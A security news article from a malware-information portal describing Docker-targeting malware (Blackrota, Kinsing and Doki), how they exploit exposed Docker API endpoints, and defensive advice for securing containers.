Blackrota – Docker’s Newest Malware

It is not an underestimation by any means to say that ransomware dominates the InfoSec news feed. This has been the case for several years but 2020 is surely breaking all the past records. With ransomware dominating the headlines a few other malware trends for the year have crept by almost unnoticed. One of those trends is the increase in popularity of Docker malware. Docker has become a popular framework for web and app developers, since 2017 there has been an emergence of malware targeting Docker users you don’t properly secure their applications.

Initially, the malware discovered looked to infect developers who had misconfigured admin interfaces. This was done to drop cryptocurrency miners, like CoinMiner, and attackers simply trawled for vulnerable systems. Since the early days of Docker malware, threats have evolved significantly since then and new malware strains are being discovered on a regular basis. Despite the rise in this kind of malware developers are still not applying basic cybersecurity principles to projects. The most common mistake made by developers is leaving Docker remote administration API endpoints exposed online without authentication. Hackers will then look to install cryptocurrency miners or backdoor trojans via malicious operating system images (OS Images).

According to a recently published blog post, Chinese security firm Qihoo 360 has discovered another strain of Docker malware, codenamed Blackrota after the name the malware’s developers gave to the command and control server blackrota.ga.

blackrota malware

The malware is written in the ever-increasing in popularity Go, or Golang, a programming language which has recently also seen increased use by malware developers. Qihoo 360 researchers have only discovered a Linux version to date and are unsure what exactly the malware is used for. Researchers noted,

The Blackrota backdoor is currently only available for Linux, in ELF file format, and supports both x86/x86-64 CPU architectures. Blackrota is configured and compiled based on geacon, a CobaltStrike Beacon implemented in the Go language, which can be used as a CobalStrike Beacon that interacts with CobaltStrike to control compromised hosts…However, it only implements some of the key functions in the original CobaltStrike Beacon:

  • CMD_SHELL: Execute Shell command;
  • CMD_UPLOAD: Upload files;
  • CMDDOWNLOAD: Download the specified file;
  • CMD_FILE_BROWSE: File browsing;
  • CMD_CD: Change directory;
  • CMD_SLEEP: Set the sleep delay time;
  • CMD_PWD: Return current directory;
  • CMD_EXIT: Exit.

CobaltStrike is a popular penetration testing tool used by both legitimate and illegitimate parties. Threat actors have also looked to further abuse the tool by abusing the Cobalt Strike framework client agent, known as Beacon. In this instance, Blackrota uses a compiled version of Beacon called Geacon. What further makes Blockrota is that the code is obfuscated using an open-source tool gobfuscate. Currently, finding malware written in Go that is obfuscated is rare, EKANS being another. Researchers noted,

“The obfuscation method of Blackrota and EKANS creates new challenges for reverse analysis. As the Go language becomes more popular, more and more malware will be written in Go in the future, we will keep an eye on what is going to happen.”

More Docker Malware to be Aware of

In April 2020, another Docker malware was seen redefining what malware targeting Docker could do. In an article published at the time, the malware was described as fileless and self-propagating. Dangerous words to be associated with any malware. Like with other Docker malware strains, including Blackrota the attackers scanned for and targeted vulnerable Docker API ports. The campaign was highly organized and managed to infect thousands of vulnerable ports on a daily basis. The campaign had been active for months but stepped up activity towards the end of the first quarter of 2020.

The malware, named Kinsing, begins the infection routine with the above-mentioned scanning of ports left open to the Internet. Once one is discovered the malware will then access the port and run a rogue Ubuntu container. The container issues a command that fetches the Kinsing malware, which in turn downloads and runs a cryptocurrency miner. Not content to merely run the miner, the final stage of the infection routine involves the malware looking to self-propagate to other containers and hosts. Further, the malware can download a shell script. The script disables security measures and clears logs; kills any other malware or cryptominers and deletes any files related to them; kills any running rival malicious Docker containers and deletes their images; downloads the Kinsing malware and runs it; and uses the “crontab” function to download and run the same original script once every minute – it is believed this is done to ensure persistence.

Like with Blackrota the malware is written in Go and makes use of several libraries that set up communication between the infected container and the attackers command-and-control server monitor systems and processes; and establish a disk-backed key-value storage area to hold data. Its main function though is to act as a dropper to load scripts and execute other malware. This cryptocurrency miner dropped is not unique but does what it is supposed to mine bitcoin using the victim’s resources. It is feared that Kinsing may be used to drop other malware types, not just the miner, in the past crypto-jacking malware, designed to steal cryptocurrency wallet addresses and credentials, has been used in campaigns targeting Docker containers. However, like Kinsing the miner can also spread laterally infecting other containers the developer may have set up.

Kinsing is noteworthy for its ability to self-propagate but perhaps the most famous Docker malware is Doki. The malware yet again begins with the attacker scanning for vulnerable ports but fills the role of creating a backdoor in the infected container. Doki is believed to be spread by the Ngrok Botnet with researchers concluding,

“The Ngrok Botnet campaign has been ongoing for over two years and is rather effective, infecting any misconfigured Docker API server in a matter of hours. The incorporation of the unique and undetected Doki malware indicates the operation is continuing to evolve. This attack is very dangerous due to the fact the attacker uses container escape techniques to gain full control of the victim’s infrastructure. Our evidence shows that it takes only a few hours from when a new misconfigured Docker server is up online to become infected by this campaign."

Lessons needing to be Learnt

Blockrota, in summary, is a Cobalt Strike Beacon written in Go. While the malware’s main purpose is yet unknown, its discovery does teach an important lesson, namely that developers need to ensure servers are configured correctly. Docker can no longer be considered a fringe technology; the popularity of the framework means that it is now a viable target for threat actors to exploit. If developers do not take any measures to secure servers and properly configure interfaces heartache and hard lessons will surely follow.

The documentation of Docker does include a number of security measures developers can take to help prevent being targeted by threat actors. Further, there are several online video tutorials and step-by-step guides available to help in the process. Security researchers for Trend Micro have also provided some helpful advice for developers not looking to make any security mistakes when deploying applications. They advise that developers minimize the use of third-party software when introducing it to the docker container.

If third-party software must be used make sure it is from a trusted source. Containers should be hosted in a container focused OS, this greatly reduces the attack surface. Security tools like Clair can help prevent vulnerability exploitation and can provide analysis of containers to further help in securing them. Lastly, scan images in the containers to see if they contain any vulnerabilities.

As more and more developers turn to Docker and malware targeting the framework and as its user base increases there will likely be a surge in new malware variants. The future will bring more damaging types of malware, not just coin miners and backdoors.

▼ Show Discussion

About the author:

Karolis Liucveikis

Karolis Liucveikis - experienced software engineer, passionate about behavioral analysis of malicious apps.

Author and general operator of PCrisk's "Removal Guides" section. Co-researcher working alongside Tomas to discover the latest threats and global trends in the cyber security world. Karolis has experience of over five years working in this branch. He attended KTU University and graduated with a degree in Software Development in 2017. Extremely passionate about technical aspects and behavior of various malicious applications. Contact Karolis Liucveikis.

PCrisk security portal is brought by a company RCS LT. Joined forces of security researchers help educate computer users about the latest online security threats. More information about the company RCS LT.

Our malware removal guides are free. However, if you want to support us you can send us a donation.

About PCrisk

PCrisk logo

PCrisk is a cyber security portal, informing Internet users about the latest digital threats. Our content is provided by security experts and professional malware researchers. Read more about us.

Malware activity

Global malware activity level today:

Medium threat activity

Increased attack rate of infections detected within the last 24 hours.

Virus and malware removal

This page provides information on how to avoid infections by malware or viruses and is useful if your system suffers from common spyware and malware attacks.

Learn about malware removal